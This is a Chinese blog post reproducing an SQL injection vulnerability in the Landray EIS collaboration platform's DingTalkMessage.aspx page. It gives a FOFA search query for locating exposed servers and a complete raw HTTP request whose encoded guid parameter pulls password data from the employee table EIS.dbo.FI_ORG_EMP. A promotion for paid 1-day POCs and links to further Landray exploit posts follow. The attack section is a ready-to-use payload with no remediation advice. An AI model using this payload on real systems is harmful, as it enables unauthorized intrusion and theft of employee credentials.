蓝凌 Landray-EIS智慧协同平台 DingTalk SQL注入漏洞

最新推荐文章于 2024-06-25 18:04:38 发布
最新推荐文章于 2024-06-25 18:04:38 发布
阅读量325 收藏
点赞数 10
分类专栏: 漏洞复现 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WuYSec/article/details/139592616
版权

0x01 漏洞描述

蓝凌EIS智慧协同平台是一款为成长型企业提供高效协同办公和团队合作的产品。

蓝凌EIS智慧协同平台存在SQL注入漏洞,攻击者可以利用这些漏洞获取数据库敏感信息

0x02 资产测绘

app="Landray-EIS智慧协同平台"

0x03 漏洞复现

GET /third/DingTalk/Pages/DingTalkMessage.aspx?redirectUrl=12&guid=1%27%2B%28SELECT%20CHAR%28107%29%2BCHAR%28108%29%2BCHAR%2877%29%2BCHAR%2868%29%20WHERE%209553%3D9553%20AND%206423%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20ISNULL%28CAST%28COUNT%28pwd%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20%28SELECT%20pwd%2C%20ROW_NUMBER%28%29%20OVER%20%28ORDER%20BY%20%28SELECT%201%29%29%20AS%20CAP%20FROM%20EIS.dbo.FI_ORG_EMP%29x%20WHERE%20CAP%3D22%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29%29%2B%27 HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

0x04 知识星球

无垠Sec专注安全研究,包括但不限于代码审计、漏洞挖掘、思路分享等。目前仅需50,你就能得到常见系统1day漏洞POC、代码审计、漏洞分析、漏洞挖掘等

WuY1nSec
关注
专栏目录
蓝凌EIS智慧协同平台 rpt_listreport_definefield.aspx SQL注入漏洞复现
0xSec
03-04 491
由于蓝凌EIS智慧协同平台 rpt_listreport_definefield.aspx接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。
蓝凌EIS智慧协同平台 多处SQL注入漏洞复现
0xSec
01-12 605
​由于蓝凌EIS智慧协同平台 doc_fileedit_word.aspx、frm_form_list_main.aspx、frm_button_func.aspx、fl_define_flow_chart_show.aspx等接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。
蓝凌EIS智慧协同平台 fl_define_flow_chart_show.aspx 存在 SQL注入漏洞
3tefanie丶zhou的博客
01-10 509
蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能,旨在提升企业内部沟通、协作和信息共享的效率。由于蓝凌EIS智慧协同平台 fl_define_flow_chart_show.aspx接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。
蓝凌(Landray)OA漏洞常见RCE
最新发布
baimao__Ch的博客
06-25 1272
背景是由于一次和友商共同的渗透项目测试中,其中一个系统使用了蓝凌OA,但当时由于一些原因觉得版本挺新应该是打了补丁的故在测试中没有仔细遍历复现蓝凌OA的历史常见RCE漏洞,后续对比了友商的报告发现别人测的两个RCE,故统一做个poc积累学习,混个眼熟防止下次渗透或攻防时漏掉。
全新接口-蓝凌EIS智慧协同平台多处SQL注入漏洞-1day未公开漏洞
weixin_43167326的博客
02-22 484
蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能,旨在提升企业内部沟通、协作和信息共享的效率。
蓝凌EIS智慧协同平台 SQL注入漏洞复现
0xSec
12-15 926
由于蓝凌EIS智慧协同平台UniformEntry.asp接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。
蓝凌EIS智慧协同平台 fl_define_flow_chart_show sql注入漏洞
m0_50797689的博客
01-26 135
蓝凌EIS智慧协同平台 fl_define_flow_chart_show sql注入漏洞
漏洞复现】蓝凌EIS智慧协同平台-ShowUserInfo-sql注入
知黑而守白
01-11 293
蓝凌EIS智慧协同平台是个自动化办公OA,具有多端同步、无缝协作,提供移动端(蓝凌KK、阿里钉钉、微信企业号)、桌面端、网页端多端应用统一入口、跨屏操作、信息同步知识云服务集成、学习与创新应用、企业2.0应用、跨系统整合等优点,并且在诸多公司也采用该平台蓝凌EIS智慧协同平台ShowUserInfo接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
漏洞复现】蓝凌EIS智慧协同平台-frm-form-list-main-sql注入
知黑而守白
01-15 127
蓝凌EIS智慧协同平台是个自动化办公OA,具有多端同步、无缝协作,提供移动端(蓝凌KK、阿里钉钉、微信企业号)、桌面端、网页端多端应用统一入口、跨屏操作、信息同步知识云服务集成、学习与创新应用、企业2.0应用、跨系统整合等优点,并且在诸多公司也采用该平台蓝凌EIS智慧协同平台 frm_form_list_main 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
蓝凌EIS智慧协同平台doc_fileedit_word.aspx-SQL注入
qq_39342001的博客
04-03 289
作者不对任何人使用本文中信息所产生的结果负责。任何人在使用本文文中的信息时,应自行承担全部责任,并确保其符合所有相关法律和规定。本文中提及的所有技术和工具,都应在合法和道德的范围内使用。作者不鼓励或支持任何非法或不道德的行为,包括但不限于侵犯版权、侵犯隐私或违反任何其他法律。蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能,旨在提升企业内部沟通、协作和信息共享的效率。如果文档中包含任何第三方版权材料,版权归原作者所有,如有侵权,请联系作者进行处理。
漏洞复现】蓝凌EIS智慧协同平台saveImg接口存在任意文件上传
失心少年
10-23 403
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!蓝凌智慧协同平台满足组织企业在知识、协同及项目管理系统中建设等需求。该平台在saveImg接口处存在任意文件上传,攻击者可通过该漏洞上传Weshell控制服务器。1.利用如下POC进行POST请求上传文件。
【复现】蓝凌OA SQL注入漏洞_61
fushuang333的博客
02-29 1295
【复现】蓝凌OA SQL注入漏洞,​攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
漏洞复现-蓝凌LandrayOA系列
aming小老弟
03-08 1767
LandrayOA_sysSearchMain_Rce漏洞LandrayOA_Custom_SSRF_JNDI漏洞LandrayOA_Custom_FileRead漏洞
探索LandrayExploit:一款强大的网络漏洞利用工具
gitblog_00085的博客
04-21 305
探索LandrayExploit:一款强大的网络漏洞利用工具 项目地址:https://gitcode.com/haibara3839/LandrayExploit 项目简介 LandrayExploit 是一个由开发者Haibara3839创建的开源项目,主要专注于网络漏洞的发现与利用。它提供了一系列自动化工具,帮助安全研究人员和渗透测试人员更有效地进行网络安全评估。 技术分析 LandrayE...
漏洞复现】蓝凌EIS智慧协同平台-dingtalkmessage-sql注入
知黑而守白
01-25 285
蓝凌EIS智慧协同平台是个自动化办公OA,具有多端同步、无缝协作,提供移动端(蓝凌KK、阿里钉钉、微信企业号)、桌面端、网页端多端应用统一入口、跨屏操作、信息同步知识云服务集成、学习与创新应用、企业2.0应用、跨系统整合等优点,并且在诸多公司也采用该平台蓝凌EIS智慧协同平台 dingtalkmessage 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
蓝凌OA前台任意文件读取漏洞利用
08-05 1970
近期CNVD爆出漏洞编号:CNVD-2021-28277,首次公开日期为2021-04-15,蓝凌oa存在多个漏洞,攻击者可利用该漏洞获取服务器控制权。今天挑选一个蓝凌OA前台任意文件读取漏洞进行分析使用。链接:https://www.cnvd.org.cn/flaw/show/CNVD-2021-28277 蓝凌简介:蓝凌软件全称深圳市蓝凌软件股份有限公司,于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服
漏洞复现】蓝凌OA近期公开几个漏洞汇总
Adminxe的博客
07-02 5388
0x00 蓝凌OA custom.jsp 任意文件读取漏洞 1、app=”Landray-OA系统” 2、漏洞复现 出现漏洞的文件为 custom.jsp <%@page import="com.landray.kmss.util.ResourceUtil"%> <%@page import="net.sf.json.JSONArray"%> <%@page import="net.sf.json.JSONObject"%> <%@ page lang..
蓝凌EIS4.0:打造智慧协同工作平台
"蓝凌EIS4.0是一款智慧协同平台,旨在通过高效的知识管理和协同工作,提升企业的运营效率和员工的工作智慧。该白皮书详细介绍了EIS4.0的设计思想、技术架构、产品特点、四大核心应用、扩展功能以及贴心服务,并通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值